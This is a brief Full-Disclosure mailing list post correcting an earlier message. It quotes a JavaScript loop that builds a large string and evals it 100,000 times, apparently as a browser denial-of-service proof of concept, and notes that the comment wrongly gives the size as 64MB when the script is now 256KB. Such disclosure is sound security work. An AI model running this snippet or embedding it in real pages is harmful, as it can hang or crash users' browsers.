I wrote: > b='';a="b=b+' ';" > for (var i=0;i<15;++i) a+=a; > // Above line creates a 64MB script > // Now run the 64MB script, 100,000 times > for (var i=0;i<100000;++i) eval(a);
Just a quick note; I had altered the script without updating the comments. It only creates a 256KB script, now; a longer one didn't seem necessary. Sorry. Regards, Grant. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
